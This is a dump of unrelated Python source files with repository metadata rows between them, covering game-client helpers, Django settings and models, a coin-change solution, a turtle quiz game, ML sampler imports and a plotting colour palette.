return '../maps/icons/vehicle/unique/%s' % getItemIconName(vehicleName) if withLightning else '../maps/icons/vehicle/unique/normal_%s' % getItemIconName(vehicleName)
def getTypeSmallIconPath(vehicleType, isElite=False):
key = vehicleType + '.png'
return RES_ICONS.maps_icons_vehicletypes_elite(key) if isElite else RES_ICONS.maps_icons_vehicletypes(key)
def getTypeBigIconPath(vehicleType, isElite):
key = 'big/' + vehicleType
if isElite:
key += '_elite'
key += '.png'
return RES_ICONS.maps_icons_vehicletypes(key)
def getUserName(vehicleType, textPrefix=False):
return _getActualName(vehicleType.userString, vehicleType.tags, textPrefix)
def getShortUserName(vehicleType, textPrefix=False):
return _getActualName(vehicleType.shortUserString, vehicleType.tags, textPrefix)
def _getActualName(name, tags, textPrefix=False):
if checkForTags(tags, VEHICLE_TAGS.PREMIUM_IGR):
if textPrefix:
return i18n.makeString(ITEM_TYPES.MARKER_IGR, vehName=name)
return makeHtmlString('html_templates:igr/premium-vehicle', 'name', {'vehicle': name})
return name
def checkForTags(vTags, tags):
if not hasattr(tags, '__iter__'):
tags = (tags,)
return bool(vTags & frozenset(tags))
def findVehicleArmorMinMax(vd):
def findComponentArmorMinMax(armor, minMax):
for value in armor:
if value != 0:
if minMax is None:
minMax = [value, value]
else:
minMax[0] = min(minMax[0], value)
minMax[1] = max(minMax[1], value)
return minMax
minMax = None
minMax = findComponentArmorMinMax(vd.hull.primaryArmor, minMax)
for turrets in vd.type.turrets:
for turret in turrets:
minMax = findComponentArmorMinMax(turret.primaryArmor, minMax)
return minMax
def _sortCrew(crewItems, crewRoles):
RO = Tankman.TANKMEN_ROLES_ORDER
return sorted(crewItems, cmp=lambda a, b: RO[crewRoles[a[0]][0]] - RO[crewRoles[b[0]][0]])
def getLobbyDescription(vehicle):
return text_styles.stats(i18n.makeString('#menu:header/level/%s' % vehicle.level)) + ' ' + text_styles.main(i18n.makeString('#menu:header/level', vTypeName=getTypeUserName(vehicle.type, vehicle.isElite)))
def getOrderByVehicleClass(className=None):
if className and className in VEHICLE_BATTLE_TYPES_ORDER_INDICES:
result = VEHICLE_BATTLE_TYPES_ORDER_INDICES[className]
else:
result = UNKNOWN_VEHICLE_CLASS_ORDER
return result
def getVehicleClassTag(tags):
subSet = vehicles.VEHICLE_CLASS_TAGS & tags
result = None
if subSet:
result = list(subSet).pop()
return result
_VEHICLE_STATE_TO_ICON = {Vehicle.VEHICLE_STATE.BATTLE: RES_ICONS.MAPS_ICONS_VEHICLESTATES_BATTLE,
Vehicle.VEHICLE_STATE.IN_PREBATTLE: RES_ICONS.MAPS_ICONS_VEHICLESTATES_INPREBATTLE,
Vehicle.VEHICLE_STATE.DAMAGED: RES_ICONS.MAPS_ICONS_VEHICLESTATES_DAMAGED,
Vehicle.VEHICLE_STATE.DESTROYED: RES_ICONS.MAPS_ICONS_VEHICLESTATES_DAMAGED,
Vehicle.VEHICLE_STATE.EXPLODED: RES_ICONS.MAPS_ICONS_VEHICLESTATES_DAMAGED,
Vehicle.VEHICLE_STATE.CREW_NOT_FULL: RES_ICONS.MAPS_ICONS_VEHICLESTATES_CREWNOTFULL,
Vehicle.VEHICLE_STATE.RENTAL_IS_OVER: RES_ICONS.MAPS_ICONS_VEHICLESTATES_RENTALISOVER,
Vehicle.VEHICLE_STATE.UNSUITABLE_TO_UNIT: RES_ICONS.MAPS_ICONS_VEHICLESTATES_UNSUITABLETOUNIT,
Vehicle.VEHICLE_STATE.UNSUITABLE_TO_QUEUE: RES_ICONS.MAPS_ICONS_VEHICLESTATES_UNSUITABLETOUNIT,
Vehicle.VEHICLE_STATE.GROUP_IS_NOT_READY: RES_ICONS.MAPS_ICONS_VEHICLESTATES_GROUP_IS_NOT_READY}
def getVehicleStateIcon(vState):
if vState in _VEHICLE_STATE_TO_ICON:
icon = _VEHICLE_STATE_TO_ICON[vState]
else:
icon = ''
return icon
def getBattlesLeft(vehicle):
return i18n.makeString('#menu:infinitySymbol') if vehicle.isInfiniteRotationGroup else str(vehicle.rotationBattlesLeft)
| [
"[email protected]"
] | |
62cfb6b503b6ce9ea99f372bcf8a13687c42dca9 | b3b68efa404a7034f0d5a1c10b281ef721f8321a | /Scripts/simulation/conditional_layers/conditional_layer_handlers.py | 9f92448745a071c4aac20c994e6eed081d12f54c | [
"Apache-2.0"
] | permissive | velocist/TS4CheatsInfo | 62195f3333076c148b2a59f926c9fb5202f1c6fb | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | refs/heads/main | 2023-03-08T01:57:39.879485 | 2021-02-13T21:27:38 | 2021-02-13T21:27:38 | 337,543,310 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,967 | py | # uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\conditional_layers\conditional_layer_handlers.py
# Compiled at: 2018-05-11 22:46:41
# Size of source mod 2**32: 5273 bytes
from gsi_handlers.gameplay_archiver import GameplayArchiver
from sims4.gsi.dispatcher import GsiHandler
from sims4.gsi.schema import GsiGridSchema, GsiFieldVisualizers
import date_and_time, enum, services
conditional_layer_service_schema = GsiGridSchema(label='Conditional Layers/Conditional Layer Service')
conditional_layer_service_schema.add_field('conditional_layer', label='Class Name', width=1, unique_field=True)
conditional_layer_service_schema.add_field('layer_hash', label='Layer Name', width=1)
conditional_layer_service_schema.add_field('objects_created', label='Objects Created', width=1)
conditional_layer_service_schema.add_field('requests_waiting', label='Requests Waiting', width=1)
conditional_layer_service_schema.add_field('last_request', label='Last Request', width=1)
with conditional_layer_service_schema.add_has_many('Objects', GsiGridSchema) as (sub_schema):
sub_schema.add_field('object_id', label='Object Id')
sub_schema.add_field('object', label='Object')
with conditional_layer_service_schema.add_has_many('Requests', GsiGridSchema) as (sub_schema):
sub_schema.add_field('request', label='Request')
sub_schema.add_field('speed', label='Speed')
sub_schema.add_field('timer_interval', label='Timer Interval')
sub_schema.add_field('timer_object_count', label='Timer Object Count')
@GsiHandler('conditional_layer_service', conditional_layer_service_schema)
def generate_conditional_layer_service_data(zone_id: int=None):
layer_data = []
conditional_layer_service = services.conditional_layer_service()
if conditional_layer_service is None:
return layer_data
object_manager = services.object_manager()
for conditional_layer, layer_info in conditional_layer_service._layer_infos.items():
object_data = []
for object_id in layer_info.objects_loaded:
obj = object_manager.get(object_id)
object_data.append({'object_id':str(object_id),
'object':str(obj)})
request_data = []
for request in conditional_layer_service.requests:
if request.conditional_layer is conditional_layer:
request_data.append({'request':str(request),
'speed':request.speed.name,
'timer_interval':str(request.timer_interval),
'timer_object_count':str(request.timer_object_count)})
layer_data.append({'layer_hash':str(conditional_layer.layer_name),
'conditional_layer':str(conditional_layer),
'objects_created':str(len(layer_info.objects_loaded)),
'requests_waiting':str(len(request_data)),
'last_request':str(layer_info.last_request_type),
'Objects':object_data,
'Requests':request_data})
return layer_data
class LayerRequestAction(enum.Int, export=False):
SUBMITTED = ...
EXECUTING = ...
COMPLETED = ...
conditional_layer_request_archive_schema = GsiGridSchema(label='Conditional Layers/Conditional Layer Request Archive', sim_specific=False)
conditional_layer_request_archive_schema.add_field('game_time', label='Game/Sim Time', type=(GsiFieldVisualizers.TIME))
conditional_layer_request_archive_schema.add_field('request', label='Request')
conditional_layer_request_archive_schema.add_field('action', label='Action')
conditional_layer_request_archive_schema.add_field('layer_hash', label='Layer Hash')
conditional_layer_request_archive_schema.add_field('speed', label='Speed')
conditional_layer_request_archive_schema.add_field('timer_interval', label='Timer Interval')
conditional_layer_request_archive_schema.add_field('timer_object_count', label='Timer Object Count')
conditional_layer_request_archive_schema.add_field('objects_in_layer_count', label='Object Count')
archiver = GameplayArchiver('conditional_layer_requests', conditional_layer_request_archive_schema,
add_to_archive_enable_functions=True)
def is_archive_enabled():
return archiver.enabled
def archive_layer_request_culling(request, action, objects_in_layer_count=None):
time_service = services.time_service()
if time_service.sim_timeline is None:
time = 'zone not running'
else:
time = time_service.sim_now
entry = {'game_type':str(time), 'request':str(request),
'action':action.name,
'layer_hash':str(hex(request.conditional_layer.layer_name)),
'speed':request.speed.name,
'timer_interval':str(request.timer_interval),
'timer_object_count':str(request.timer_object_count),
'objects_in_layer_count':str(objects_in_layer_count) if objects_in_layer_count else ''}
archiver.archive(entry) | [
"[email protected]"
] | |
78de7289058ba6cd0376717e3c054543a4765a6e | dda618067f13657f1afd04c94200711c1920ea5f | /scoop/user/util/inlines.py | fae84630c7d38141cbccae33232c7d71bd188d6d | [] | no_license | artscoop/scoop | 831c59fbde94d7d4587f4e004f3581d685083c48 | 8cef6f6e89c1990e2b25f83e54e0c3481d83b6d7 | refs/heads/master | 2020-06-17T20:09:13.722360 | 2017-07-12T01:25:20 | 2017-07-12T01:25:20 | 74,974,701 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 952 | py | # coding: utf-8
from django_inlines import inlines
from django_inlines.inlines import TemplateInline
from scoop.user.models import User
class UserInline(TemplateInline):
"""
Inline d'insertion d'utilisateur
Format : {{user id [style=link|etc.]}}
Exemple : {{user 2490 style="link"}}
"""
inline_args = [{'name': 'style'}]
def get_context(self):
""" Renvoyer le contexte d'affichage du template """
identifier = self.value
style = self.kwargs.get('style', 'link')
# Vérifier que l'utilisateur demandé existe
user = User.objects.get_or_none(id=identifier)
return {'user': user, 'style': style}
def get_template_name(self):
""" Renvoyer le chemin du template """
base = super(UserInline, self).get_template_name()[0]
path = "user/%s" % base
return path
# Enregistrer les classes d'inlines
inlines.registry.register('user', UserInline)
| [
"[email protected]"
] | |
c387bf8145f4fb230a3446850b2101b88050201a | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/8/uz4.py | eb498670c22bbeea754028188e9d8126364e9394 | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'uZ4':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"[email protected]"
] | |
3f56e0b32438cf0782e92e5ea2de9f3379161e3d | 679cbcaa1a48c7ec9a4f38fa42d2dc06d7e7b6ef | /main.py | d5f2cef309384ff826e8e3934d2f1a1e69578595 | [] | no_license | roblivesinottawa/canada_provinces_game | cb2242845e3dd3a3902c0f416ac1a4efa485aecf | 2aa5c7236c2ac7381522b493fddf415ece9c3a87 | refs/heads/main | 2023-03-04T08:08:31.409489 | 2021-02-17T21:46:18 | 2021-02-17T21:46:18 | 339,863,158 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,000 | py | import turtle
import pandas
screen = turtle.Screen()
screen.title("Canada Provinces Game")
image = "canada_map.gif"
screen.addshape(image)
turtle.shape(image)
data = pandas.read_csv("canada_provinces.csv")
all_provinces = data.province.to_list()
guessed = []
while len(guessed) < 50:
answer = screen.textinput(title=f"{len(guessed)} / 12 Provinces Correct",
prompt="What's another provinces's name? ").title()
if answer == "Exit":
missing = []
for province in all_provinces:
if province not in guessed:
missing.append(province)
new_data = pandas.DataFrame(missing)
new_data.to_csv("provinces_to_learn.csv")
break
if answer in all_provinces:
guessed.append(guessed)
t = turtle.Turtle()
t.hideturtle()
t.penup()
province_data = data[data.province == answer]
t.goto(float(province_data.x), float(province_data.y))
t.write(answer)
# turtle.mainloop() | [
"[email protected]"
] | |
6605d4e27c4cb4a040af60508ae4e17b5382aed8 | f594560136416be39c32d5ad24dc976aa2cf3674 | /mmdet/core/bbox/samplers/__init__.py | f58505b59dca744e489328a39fdabb02a893fb51 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | ShiqiYu/libfacedetection.train | bd9eb472c2599cbcb2f028fe7b51294e76868432 | dce01651d44d2880bcbf4e296ad5ef383a5a611e | refs/heads/master | 2023-07-14T02:37:02.517740 | 2023-06-12T07:42:00 | 2023-06-12T07:42:00 | 245,094,849 | 732 | 206 | Apache-2.0 | 2023-06-12T07:42:01 | 2020-03-05T07:19:23 | Python | UTF-8 | Python | false | false | 827 | py | # Copyright (c) OpenMMLab. All rights reserved.
from .base_sampler import BaseSampler
from .combined_sampler import CombinedSampler
from .instance_balanced_pos_sampler import InstanceBalancedPosSampler
from .iou_balanced_neg_sampler import IoUBalancedNegSampler
from .mask_pseudo_sampler import MaskPseudoSampler
from .mask_sampling_result import MaskSamplingResult
from .ohem_sampler import OHEMSampler
from .pseudo_sampler import PseudoSampler
from .random_sampler import RandomSampler
from .sampling_result import SamplingResult
from .score_hlr_sampler import ScoreHLRSampler
__all__ = [
'BaseSampler', 'PseudoSampler', 'RandomSampler',
'InstanceBalancedPosSampler', 'IoUBalancedNegSampler', 'CombinedSampler',
'OHEMSampler', 'SamplingResult', 'ScoreHLRSampler', 'MaskPseudoSampler',
'MaskSamplingResult'
]
| [
"[email protected]"
] | |
95bd533c71288b3f5335ed21e13942f5d7a24460 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03501/s994611067.py | 15296b32c0316cdc8748c1ea5d5ad1e71546c200 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 73 | py | n,a,b=map(int,raw_input().split())
if a*n <b:
print a*n
else:
print b | [
"[email protected]"
] | |
78a54771d395abae7a5403a3cdbd6b176f71da9e | d4252920cf72df6973c31dad81aacd5d9ad6d4c6 | /core_example/core_export_with_name.py | 52b36666b3edfbf02e3adaec01909a7214c30acb | [] | no_license | tnakaicode/GeomSurf | e1894acf41d09900906c8d993bb39e935e582541 | 4481180607e0854328ec2cca1a33158a4d67339a | refs/heads/master | 2023-04-08T15:23:22.513937 | 2023-03-20T04:56:19 | 2023-03-20T04:56:19 | 217,652,775 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,697 | py | import numpy as np
import sys
import time
import os
from OCC.Display.SimpleGui import init_display
from OCC.Core.gp import gp_Pnt
from OCC.Core.XSControl import XSControl_Writer, XSControl_WorkSession
from OCC.Core.XCAFApp import XCAFApp_Application
from OCC.Core.XCAFDoc import XCAFDoc_DocumentTool_ShapeTool
from OCC.Core.STEPCAFControl import STEPCAFControl_Writer
from OCC.Core.STEPControl import STEPControl_Writer, STEPControl_Reader
from OCC.Core.STEPControl import STEPControl_AsIs
from OCC.Core.Interface import Interface_Static_SetCVal
from OCC.Core.IFSelect import IFSelect_RetDone
from OCC.Core.TDF import TDF_LabelSequence, TDF_Label, TDF_Tool, TDF_Data
from OCC.Core.TDocStd import TDocStd_Document
from OCC.Core.TDataStd import TDataStd_Name, TDataStd_Name_GetID
from OCC.Core.TCollection import TCollection_AsciiString
from OCC.Core.TCollection import TCollection_ExtendedString
from OCC.Core.BRepPrimAPI import BRepPrimAPI_MakeBox
from OCC.Extend.DataExchange import write_step_file, read_step_file
from OCC.Extend.DataExchange import read_step_file_with_names_colors
from OCCUtils.Construct import make_plane, make_vertex, make_circle
# https://www.opencascade.com/doc/occt-7.4.0/refman/html/class_t_collection___extended_string.html
# https://www.opencascade.com/doc/occt-7.4.0/refman/html/class_x_c_a_f_app___application.html
# https://www.opencascade.com/doc/occt-7.4.0/refman/html/class_t_doc_std___document.html
class ExportCAFMethod (object):
    """Small helper that collects OCC shapes into an XCAF document and
    writes them out as a single AP214 STEP file.

    NOTE(review): the ``tol`` constructor argument and the ``name``
    argument of :meth:`Add` are currently unused — shapes are added
    without named labels despite the TDataStd_Name import. Confirm
    whether label naming was intended here.
    """
    def __init__(self, name="name", tol=1.0E-10):
        # base name used as the default output filename in Write()
        self.name = name
        self.writer = STEPCAFControl_Writer()
        self.writer.SetNameMode(True)
        self.doc = TDocStd_Document(
            TCollection_ExtendedString("pythonocc-doc"))
        #self.x_app = XCAFApp_Application.GetApplication()
        # self.x_app.NewDocument(
        #    TCollection_ExtendedString("MDTV-CAF"), self.doc)
        # shape tool manages the document's top-level shape labels
        self.shape_tool = XCAFDoc_DocumentTool_ShapeTool(self.doc.Main())
        Interface_Static_SetCVal("write.step.schema", "AP214")
    def Add(self, shape, name="name"):
        """Register *shape* in the document and (re)transfer the whole
        document into the STEP writer.

        Translation modes for reference:
        STEPControl_AsIs translates an Open CASCADE shape to its highest possible STEP representation.
        STEPControl_ManifoldSolidBrep translates an Open CASCADE shape to a STEP manifold_solid_brep or brep_with_voids entity.
        STEPControl_FacetedBrep translates an Open CASCADE shape into a STEP faceted_brep entity.
        STEPControl_ShellBasedSurfaceModel translates an Open CASCADE shape into a STEP shell_based_surface_model entity.
        STEPControl_GeometricCurveSet translates an Open CASCADE shape into a STEP geometric_curve_set entity.
        """
        # NOTE(review): `label` is never used and `name` is never applied
        # to it; Transfer() is re-run on every Add (idempotent but wasteful)
        label = self.shape_tool.AddShape(shape)
        self.writer.Transfer(self.doc, STEPControl_AsIs)
    def Write(self, filename=None):
        """Write the accumulated document to *filename* (defaults to
        self.name), appending a ".stp" extension when none is given."""
        if not filename:
            filename = self.name
        path, ext = os.path.splitext(filename)
        if not ext:
            ext = ".stp"
        status = self.writer.Write(path + ext)
        # fail loudly if the STEP writer reported anything but success
        assert(status == IFSelect_RetDone)
if __name__ == "__main__":
display, start_display, add_menu, add_function_to_menu = init_display()
display.DisplayShape(gp_Pnt())
root = ExportCAFMethod(name="root")
root.Add(make_vertex(gp_Pnt()), name="pnt")
root.Add(make_plane(center=gp_Pnt(0, 0, 0)), name="pln0")
root.Add(make_plane(center=gp_Pnt(0, 0, 100)), name="pln1")
root.Add(make_circle(gp_Pnt(0, 0, 0), 100), name="circle")
root.Write()
display.FitAll()
box = BRepPrimAPI_MakeBox(10, 10, 10).Solid()
writer = STEPControl_Writer()
fp = writer.WS().TransferWriter().FinderProcess()
print(fp)
# start_display()
| [
"[email protected]"
] | |
c116261efdbfd8e7028b91803627518d781d088c | d7d2712ed98c748fda35c47c8f6ae21ea1d3b421 | /users/settings.py | 30b0ed03d895aee405e289d97f99c6386f3b049e | [] | no_license | kamral/user_models | 5bdd4bd5583b075cfef70a2b7be229575518ad97 | b75c6441be9ed51268f1370051eab3aa572ed228 | refs/heads/main | 2023-01-14T20:38:10.342545 | 2020-11-30T12:32:34 | 2020-11-30T12:32:34 | 317,218,291 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,232 | py | """
Django settings for users project.
Generated by 'django-admin startproject' using Django 2.2.13.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; in production it
# should be loaded from the environment and this value rotated.
SECRET_KEY = '*6p%-fe7t_=nq^sar=twz!0!9how%x)a743e97!217-(!@0ilb'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# empty list is acceptable only while DEBUG is True; list real hosts for production
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'users_app'
]
AUTH_USER_MODEL='users_app.User'
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'users.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'users.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'db_models',
'HOST':'127.0.0.1',
'PORT':'5432',
'PASSWORD':'password',
'USER':'users_top'
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
| [
"[email protected]"
] | |
f8f06cef7eb7f8000f785ce17005caaadfb5e2b9 | 7241ebc05ce727585224b3a98b0824f99e63627d | /tool/parser/JsonParser.py | d6539c8d86cf5900ad1f23f9402586f492b77105 | [] | no_license | mabenteng/ai-kg-neo4j | ca0cc161244229821e3b89e516fb616828823609 | 713e978ffedda7986245307cace02fb7ec240acd | refs/heads/master | 2021-10-20T03:50:43.583436 | 2019-02-25T14:25:11 | 2019-02-25T14:25:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,037 | py | # -*- coding: utf-8 -*-
# coding=utf-8
"""
create_author : zhangcl
create_time : 2018-07-01
program : *_* parse the parameter and generate cypher *_*
"""
import json
class JsonParser:
    """Parser of a request parameter string.

    Wraps json.loads and records a status dict in ``self.result``
    (``code``/``message``, plus ``data`` on failure).  Python 2 code.
    """
    def __init__(self):
        """
        initialize local variables.
        """
        # parsed JSON object (None until parseJson succeeds)
        self.jsondata = None
        # status dict describing the last parse attempt
        self.result = {}
    def parseJson(self, queryparam):
        """Parse *queryparam* (a JSON string) into ``self.jsondata``.

        Returns True on success, False on failure.  On failure the
        error is printed and recorded in ``self.result``.
        :param queryparam: json string
        """
        self.querystring = queryparam
        flag = True
        try:
            self.jsondata = json.loads(queryparam)
            self.result['code'] = 200
            # NOTE(review): 'sucess' is a typo but is runtime data —
            # callers may already depend on the exact string
            self.result['message'] = 'sucess'
        except Exception as err:
            flag = False
            print err
            self.result['code'] = 500
            # err.message is Python-2-only; would break under Python 3
            self.result['message'] = err.message
            self.result['data'] = ''
        return flag
"[email protected]"
] | |
bcc9f50e79bc76fc958fb5af4610f1cf265ea29f | a2dc75a80398dee58c49fa00759ac99cfefeea36 | /bluebottle/projects/migrations/0087_merge_20190130_1355.py | 705027f9fe948f888b16eb0437a1f45584ffd9db | [
"BSD-2-Clause"
] | permissive | onepercentclub/bluebottle | e38b0df2218772adf9febb8c6e25a2937889acc0 | 2b5f3562584137c8c9f5392265db1ab8ee8acf75 | refs/heads/master | 2023-08-29T14:01:50.565314 | 2023-08-24T11:18:58 | 2023-08-24T11:18:58 | 13,149,527 | 15 | 9 | BSD-3-Clause | 2023-09-13T10:46:20 | 2013-09-27T12:09:13 | Python | UTF-8 | Python | false | false | 341 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2019-01-30 12:55
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    # Merge migration: reconciles two divergent 0086 branches of the
    # 'projects' app; intentionally performs no schema operations itself.
    dependencies = [
        ('projects', '0086_auto_20190117_1007'),
        ('projects', '0086_merge_20190121_1425'),
    ]
    operations = [
    ]
| [
"[email protected]"
] | |
7023e5ecdc00bc0113342ae94985d9d03e3efcba | afc693a1095f99cc586770fbd5a65dd40f2d822f | /docs/conf.py | 82c0e03d8f2804c1c403a6bc1943dfa63271cb9d | [
"LicenseRef-scancode-homebrewed",
"Beerware"
] | permissive | ndkoch/ihatemoney | 974f3b75d3bc2519d3c17f492d221da9fa780236 | 51bc76ecc5e310602216fb8eaa2ede2ab43b3d00 | refs/heads/master | 2020-09-27T00:03:31.320035 | 2019-12-09T00:19:22 | 2019-12-09T00:19:22 | 226,371,920 | 0 | 2 | NOASSERTION | 2019-12-09T00:19:23 | 2019-12-06T16:48:41 | Python | UTF-8 | Python | false | false | 266 | py | # coding: utf8
import sys, os
templates_path = ["_templates"]
source_suffix = ".rst"
master_doc = "index"
project = "I hate money"
copyright = "2011, The 'I hate money' team"
version = "1.0"
release = "1.0"
exclude_patterns = ["_build"]
pygments_style = "sphinx"
| [
"[email protected]"
] | |
a138938f68658430a7186f241fa868fec2590e61 | 865bd5e42a4299f78c5e23b5db2bdba2d848ab1d | /Python/322.coin-change.135397822.ac.python3.py | 5e9a0619060981526f9753a831b848d95c17ab70 | [] | no_license | zhiymatt/Leetcode | 53f02834fc636bfe559393e9d98c2202b52528e1 | 3a965faee2c9b0ae507991b4d9b81ed0e4912f05 | refs/heads/master | 2020-03-09T08:57:01.796799 | 2018-05-08T22:01:38 | 2018-05-08T22:01:38 | 128,700,683 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,207 | py | #
# [322] Coin Change
#
# https://leetcode.com/problems/coin-change/description/
#
# algorithms
# Medium (26.58%)
# Total Accepted: 92.2K
# Total Submissions: 346.9K
# Testcase Example: '[1]\n0'
#
#
# You are given coins of different denominations and a total amount of money
# amount. Write a function to compute the fewest number of coins that you need
# to make up that amount. If that amount of money cannot be made up by any
# combination of the coins, return -1.
#
#
#
# Example 1:
# coins = [1, 2, 5], amount = 11
# return 3 (11 = 5 + 5 + 1)
#
#
#
# Example 2:
# coins = [2], amount = 3
# return -1.
#
#
#
# Note:
# You may assume that you have an infinite number of each kind of coin.
#
#
# Credits:Special thanks to @jianchao.li.fighter for adding this problem and
# creating all test cases.
#
class Solution:
def coinChange(self, coins, amount):
"""
:type coins: List[int]
:type amount: int
:rtype: int
"""
MAX = float('inf')
dp = [0] + [MAX] * amount
for i in range(1, amount + 1):
dp[i] = min([dp[i - c] if i - c >= 0 else MAX for c in coins]) + 1
return [dp[amount], -1][dp[amount] == MAX]
| [
"[email protected]"
] | |
59ec3812dd12a3af309dfdcc37161df0ee23d29f | 2e89ff0a41c5ae40bc420e5d298504927ceed010 | /anything/users/migrations/0001_initial.py | fdaae19b9ff03d88bd74ac05938ab739e8e817a4 | [] | no_license | darkblank/anything | 6dc676b7a099ddfce0c511db9234715a4f0ca66c | 17589f8988ed1cb6fa049962bfd3fbe57c392fba | refs/heads/master | 2020-03-11T09:40:32.608171 | 2018-05-12T09:20:27 | 2018-05-12T09:20:27 | 129,918,989 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 989 | py | # Generated by Django 2.0.3 on 2018-05-11 23:36
from django.db import migrations, models
class Migration(migrations.Migration):
    # Initial migration for the users app: creates the custom User model.
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='User',
            fields=[
                # password/last_login mirror Django's AbstractBaseUser fields —
                # presumably this model extends it; verify against models.py
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('password', models.CharField(max_length=128, verbose_name='password')),
                ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
                ('email', models.EmailField(max_length=255, unique=True, verbose_name='email address')),
                ('nickname', models.CharField(max_length=20)),
                ('is_active', models.BooleanField(default=True)),
                ('is_admin', models.BooleanField(default=False)),
            ],
            options={
                'abstract': False,
            },
        ),
    ]
"[email protected]"
] | |
615bcc7e7e8afc56a8dc513da89e9d4f4faab88d | 83f78318d1a85045b0e29f3fed10e8ba3e5c107c | /throwback/root.py | a5a39de95633bd252ed2a43ca57c8e352c04ff32 | [] | no_license | kadrlica/throwback | c396d00230ec0e6ed4ce8c31ac6cd12e2ee76690 | c628acb9716aad433c49de4e2f71c54d2a0bc83e | refs/heads/master | 2020-03-24T09:33:03.127648 | 2018-08-02T15:04:00 | 2018-08-02T15:04:00 | 142,631,826 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,349 | py | #!/usr/bin/env python
"""
Generic python script.
"""
__author__ = "Alex Drlica-Wagner"
import matplotlib
from collections import OrderedDict as odict
# A modern version (v6-14-02) of the Palette from TColor...
# https://github.com/root-project/root/blob/2762a32343f57664b42558cd3af4031fe2f4f086/core/base/src/TColor.cxx#L2404-L2408
PALETTE = [19,18,17,16,15,14,13,12,11,20,
21,22,23,24,25,26,27,28,29,30, 8,
31,32,33,34,35,36,37,38,39,40, 9,
41,42,43,44,45,47,48,49,46,50, 2,
7, 6, 5, 4, 3, 2,1]
#7, 6, 5, 4, 3, 112,1] # original with typo
#7, 6, 5, 4, 3, 5,1] # corrected to match
